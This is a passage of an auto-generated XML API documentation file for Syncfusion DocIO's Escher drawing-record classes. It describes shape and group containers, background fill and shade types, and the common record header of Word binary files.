            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer">
            <summary>
            Shape Container msofbtSpContainer
            A shape is the elemental object that composes a drawing. All graphical figures on a drawing 
            are shapes. Each shape has a list of properties, which is stored in an array. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer.DEF_TXID_INCREMENT">
            <summary>
            Constant value.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer.DEF_PICTMARK_STRING">
            <summary>
            Specifies Word Picture watermark.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer.DEF_TEXTMARK_STRING">
            <summary>
            Specifies Power plus water mark object.
            </summary>
        </member>
        <!-- Badly formed XML comment ignored for member "F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer.DEF_NULL_STRING" -->
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer.DEF_NOTALLOWINCELL">
            <summary>
            Specifies NotAllowInCell
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer.m_bse">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer.#ctor(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer.GetPropertyValue(System.Int32)">
            <summary>
            Get uint property value by key
            </summary>
            <param name="key"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer.GetComplexPropValue(System.Int32)">
            <summary>
            Get complex property value.
            </summary>
            <param name="key"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer.HasFillEffect">
            <summary>
            Defines if document has any background effects.
            </summary>
            <returns>
            	<c>true</c> if [is filled background] [the specified back container]; otherwise, <c>false</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer.GetBackgroundFillType">
            <summary>
            Gets the type of the background fill.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer.GetBackgroundType">
            <summary>
            Gets the type of the background.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer.GetBackgroundImage(Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherClass)">
            <summary>
            Gets the background image or image bytes.
            </summary>
            <param name="escher">The escher.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer.GetBackgroundImBytes(Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherClass)">
            <summary>
            Gets the background image bytes.
            </summary>
            <param name="escher">The escher.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer.GetBackgroundColor(System.Boolean)">
            <summary>
            Gets the color of the background.
            </summary>
            <param name="isPictureBackground">if set to <c>true</c> [returns picture background color].</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer.GetGradientShadingStyle(Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.BackgroundFillType)">
            <summary>
            Get shading style for gradient.
            </summary>
            <param name="fillType">Type of the fill.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer.GetGradientShadingVariant(Syncfusion.DocIO.DLS.GradientShadingStyle)">
            <summary>
            Gets the shading variant.
            </summary>
            <param name="shadingStyle">The shading style.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer.CreateRectangleContainer">
            <summary>
            Create and init SpContainer of msosptRectangle shape type
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer.UpdateBackground(Syncfusion.DocIO.DLS.WordDocument,Syncfusion.DocIO.DLS.Background)">
            <summary>
            Creates the background container.
            </summary>
            <param name="doc">The document.</param>
            <param name="background">The background.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer.UpdateFillGradient(Syncfusion.DocIO.DLS.BackgroundGradient)">
            <summary>
            Updates the fill gradient.
            </summary>
            <param name="gradient">The gradient.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer.UpdateFillPicture(Syncfusion.DocIO.DLS.Background,System.Int32)">
            <summary>
            Updates the fill picture.
            </summary>
            <param name="fillBlipIndex">Index of the fill blip.</param>
            <param name="background">The background.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer.UpdateFillColor(System.Drawing.Color)">
            <summary>
            Updates the fill color of the container.
            </summary>
            <param name="color">The color.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer.CreateTextWatermarkContainer(System.Int32,Syncfusion.DocIO.DLS.TextWatermark)">
            <summary>
            
            </summary>
            <param name="watermarkNum"></param>
            <param name="textWatermark"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer.CreatePictWatermarkContainer(System.Int32,Syncfusion.DocIO.DLS.PictureWatermark)">
            <summary>
            
            </summary>
            <param name="watermarkNum"></param>
            <param name="pictWatermark"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer.ApplyPictureProperties(Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtTertiaryFOPT,Syncfusion.DocIO.DLS.WPicture)">
            <summary>
            Apply Picture properties to the Shape Position
            </summary>
            <param name="msofbtShapePosition"></param>
            <param name="picture"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer.CreateImageContainer(Syncfusion.DocIO.DLS.WPicture,Syncfusion.DocIO.ReaderWriter.DataStreamParser.PictureShapeProps)">
            <summary>
            
            </summary>
            <param name="pict"></param>
            <param name="pictProps"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer.CreateInlineImageContainer(Syncfusion.DocIO.DLS.WPicture)">
            <summary>
            Creates the inline image container.
            </summary>
            <param name="pict">The picture.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer.CreateTextBoxContainer(System.Boolean,Syncfusion.DocIO.DLS.WTextBoxFormat)">
            <summary>
            Creates the textbox container.
            </summary>
            <param name="txbxFormat">The TXBX format.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer.IsMetafile(System.Drawing.Imaging.ImageFormat)">
            <summary>
            
            </summary>
            <param name="imageFormat"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer.IsBitmap(System.Drawing.Imaging.ImageFormat)">
            <summary>
            Determines whether the specified image format is bitmap.
            </summary>
            <param name="imageFormat">The image format.</param>
            <returns>
            	<c>true</c> if the specified image format is bitmap; otherwise, <c>false</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer.IsBitmapForPartialTrustMode(Syncfusion.DocIO.DLS.Entities.ImageFormat)">
            <summary>
            Determines whether this image format is bitmap for partial trust mode.
            </summary>
            <param name="imageFormat">The image format.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer.WriteContainer(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer.CreateInlineTxbxImageCont">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer.CheckOptContainer">
            <summary>
            Checks the options container(fixed the problem of picture preservation for
            documents generated by old version of DocIO ).
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer.ReadInlineImageContainers(System.Int32,System.IO.Stream,Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            
            </summary>
            <param name="length"></param>
            <param name="stream"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer.GetBlipFromShapeContainer(Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.BaseEscherRecord)">
            <summary>
            
            </summary>
            <param name="escherRecord"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer.Clone">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer.CloneRelationsTo(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Clones the relations to.
            </summary>
            <param name="doc">The doc.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer.RemoveSpContainerOle">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer.WriteTextBoxOptions(System.Boolean,Syncfusion.DocIO.DLS.WTextBoxFormat)">
            <summary>
            Writes the textbox options.
            </summary>
            <param name="txbxFormat">The textbox format.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer.WritePictureOptions(Syncfusion.DocIO.ReaderWriter.DataStreamParser.PictureShapeProps,Syncfusion.DocIO.DLS.WPicture)">
            <summary>
            
            </summary>
            <param name="pictProps"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer.SetPictureCropValue(System.Single)">
            <summary>
            sets the crop value
            </summary>
            <param name="offset"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer.SetShapeOption(Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.msofbtRGFOPTE,System.UInt32,System.Int32,System.Boolean)">
            <summary>
            Set user defined textbox option.
            </summary>
            <param name="shapeProps">List of container's FOPTEs</param>
            <param name="curValue">User defined option value</param>
            <param name="fopteKey">Option's FOPTE key</param>
            <param name="isBid"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer.SetBoolShapeOption(Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.msofbtRGFOPTE,System.Int32,System.Int32,System.Int32,System.Int32,System.UInt32)">
            <summary>
            Set user defined boolean textbox property.
            </summary>
            <param name="shapeProps">Shape options</param>
            <param name="fopteKey">Option's FOPTE key</param>
            <param name="bitMask">Bit mask for option</param>
            <param name="startBit">Option's bit in bitfield</param>
            <param name="value">Options value</param>
            <param name="defValue">FopteBid's default value</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer.GetOpacity(System.Byte)">
            <summary>
            Gets the opacity.
            </summary>
            <param name="opacity">The opacity.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer.CheckEscher(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Noes the background.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer.GetCornerStyleVariant">
            <summary>
            Get shading variant for "FromCorner" shading style.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer.AddGradientFillAngle(Syncfusion.DocIO.DLS.GradientShadingStyle)">
            <summary>
            Add fillAngle fopte to gradient container.
            </summary>
            <param name="shadingStyle"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer.AddGradientFocusFopte(Syncfusion.DocIO.DLS.GradientShadingStyle,Syncfusion.DocIO.DLS.GradientShadingVariant)">
            <summary>
            Adds focus fopte to gradient container.
            </summary>
            <param name="shadingStyle"></param>
            <param name="shadingVariant"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer.AddGradientFillType(Syncfusion.DocIO.DLS.GradientShadingStyle)">
            <summary>
            Add fillType fopte to gradient container.
            </summary>
            <param name="shadingStyle"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer.AddFillProperties(Syncfusion.DocIO.DLS.GradientShadingStyle,Syncfusion.DocIO.DLS.GradientShadingVariant)">
            <summary>
            
            </summary>
            <param name="shadingStyle"></param>
            <param name="shadingVariant"></param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer.Bse">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer.Pib">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer.Shape">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer.ShapeOptions">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer.Txid">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer.ShapePosition">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer.IsWatermark">
            <summary>
            Defines if current shape container is watermark.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpgr">
             <summary>
             Group Shape Record msofbtSpgr
             This record is present only in group shapes (not shapes in groups, shapes that are groups). 
             The group shape record defines the coordinate system of the shape, which the anchors of the 
             child shape are expressed in. All other information is stored in the shape records that follow. 
            
            typedef struct _FSPGR
                    {
                      RECT   rcgBounds;
                    } FSPGR;
             </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpgr.m_rectLeft">
            <summary>
            Boundary of metafile drawing commands
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpgr.#ctor(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpgr.ReadRecordData(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpgr.WriteRecordData(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpgr.Clone">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpgrContainer">
            <summary>
            Group Container msofbtSpgrContainer
            
            A group is a collection of other shapes. The contained shapes are placed in the coordinate
            system of the group. The group container contains a variable number of shapes 
            (msofbtSpContainer) and other groups (msofbtSpgrContainer, for nested groups). 
            The group itself is a shape, and always appears as the first msofbtSpContainer in the group 
            container.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpgrContainer.#ctor(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpgrContainer.Shape">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.PictureShape">
            <summary>
            Summary description for PictureShape.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.ShapeBase">
            <summary>
            Summary description for ShapeBase.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.ShapeBase.m_shapeProps">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.ShapeBase.#ctor">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.ShapeBase.Close">
            <summary>
            Removes the reference of the used resources.
            </summary>
            <remarks></remarks>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.ShapeBase.CreateShapeImpl">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.ShapeBase.ShapeProps">
            <summary>
            Get shape 
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.PictureShape.#ctor(Syncfusion.DocIO.DLS.ImageRecord)">
            <summary>
            Constructor
            </summary>
            <param name="image"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.PictureShape.#ctor">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.PictureShape.CreateShapeImpl">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.PictureShape.ImageRecord">
            <summary>
            Get PictureShape's image
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.PictureShape.PictureProps">
            <summary>
            Get PictureShapes properties
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.TextBoxShape">
            <summary>
            Summary description for TextBoxShape.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.TextBoxShape.#ctor">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.TextBoxShape.CreateShapeImpl">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.TextBoxShape.TextBoxProps">
            <summary>
            Get TextBoxShape's properties
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherShapeType">
            <summary>
            Summary description for ShapeType.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherShapeType.msosptAccentBorderCallout1">
            <summary>
            Accent Callouts.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherShapeType.msosptActionButtonBackPrevious">
            <summary>
            Action Buttons.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherShapeType.msosptBentConnector2">
            <summary>
            Bent Connectors.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherShapeType.msosptBorderCallout1">
            <summary>
            Border Callouts.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherShapeType.msosptBracePair">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherShapeType.msosptCallout1">
            <summary>
            Callouts.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherShapeType.msosptCan">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherShapeType.msosptCurvedConnector2">
            <summary>
            Curved connectors.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherShapeType.msosptCurvedDownArrow">
            <summary>
            Curved Arrows.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherShapeType.msosptCustomShape">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherShapeType.msosptEllipse">
            <summary>
            Ellipse shapes.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherShapeType.msosptFlowChartAlternateProcess">
            <summary>
            FlowChart shapes.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherShapeType.msosptFoldedCorner">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherShapeType.msosptPictureFrame">
            <summary>
            Image shape
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherShapeType.msosptLeftArrow">
            <summary>
            Leftsided shapes. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherShapeType.msosptLightningBolt">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherShapeType.msosptSeal">
            <summary>
            Seal shape
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherShapeType.msosptTextArchDownCurve">
            <summary>
            WordArt objects.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherShapeType.msosptThickArrow">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.ShapeDocType">
            <summary>
            Summary description for ShapeDocType.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.ShapeDocType.Main">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.ShapeDocType.HeaderFooter">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FlipOrientation">
            <summary>
            Possible values for the orientation of a shape.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.BackgroundFillType">
            <summary>
            Possible types of background fill.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.BackgroundFillType.msofillSolid">
            <summary>
            Fill with a solid color.
            </summary>     
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.BackgroundFillType.msofillPattern">
            <summary>
            Fill with a pattern (bitmap).
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.BackgroundFillType.msofillTexture">
            <summary>
            A texture (pattern with its own color map).
            </summary> 
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.BackgroundFillType.msofillPicture">
            <summary>
            Center a picture in the shape.
            </summary>       
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.BackgroundFillType.msofillShade">
            <summary>
            Shade from start to end points.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.BackgroundFillType.msofillShadeCenter">
            <summary>
            Shade from bounding rectangle to end point.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.BackgroundFillType.msofillShadeShape">
            <summary>
            Shade from shape outline to end point.
            </summary>  
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.BackgroundFillType.msofillShadeScale">
            <summary>
            Similar to msofillShade, but the fillAngle
            is additionally scaled by the aspect ratio of
            the shape. If shape is square, it is the
            same as Shade.
            </summary>   
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.BackgroundFillType.msofillShadeTitle">
            <summary>
            Special type - shade to title ---  for PP
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.BackgroundFillType.msofillBackground">
            <summary>
            Use the background fill color/pattern
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.ShadeType">
            <summary>
            MSOSHADETYPE � how to interpret the colors in a shaded fill.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.ShadeType.msoshadeNone">
            <summary>
            Interpolate without correction between RGBs.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.ShadeType.msoshadeGamma">
            <summary>
            Apply gamma correction to colors.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.ShadeType.msoshadeSigma">
            <summary>
            Apply a sigma transfer function to position.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.ShadeType.msoshadeBand">
            <summary>
            Add a flat band at the start of the shade.
            </summary>    
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.ShadeType.msoshadeOneColor">
            <summary>
             This is a one color shade
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.ShadeType.msoshadeParameterShift">
            <summary>
            A parameter for the band or sigma function can be stored in the top
            16 bits of the value - this is a proportion of *each* band of the
            shade to make flat (or the approximate equal value for a sigma
            function).  NOTE: the parameter is not used for the sigma function,
            instead a built in value is used.  This value should not be changed
            from the default!
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher._MSOFBH">
            <summary>
            Common Header
            The common record header is an 8-byte structure defined in msodr.h as follows:
            typedef struct MSOFBH
                    {
                      struct
                      {
                        ULONG ver : 4;
                        ULONG inst: 12;
                        ULONG fbt : 16;
                      };
                        ULONG cbLength;
                    } MSOFBH;
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher._MSOFBH.DEF_ISCONTAINER">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher._MSOFBH.m_version">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher._MSOFBH.#ctor(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher._MSOFBH.#ctor(System.IO.Stream,Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher._MSOFBH.Read(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher._MSOFBH.Write(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher._MSOFBH.CreateRecordFromHeader">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher._MSOFBH.Clone">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher._MSOFBH.ReadHeaderWithRecord(System.IO.Stream,Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            
            </summary>
            <param name="stream"></param>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher._MSOFBH.Instance">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher._MSOFBH.IsContainer">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher._MSOFBH.Length">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher._MSOFBH.Type">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher._MSOFBH.Version">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Escher.FBSE">
            <summary>
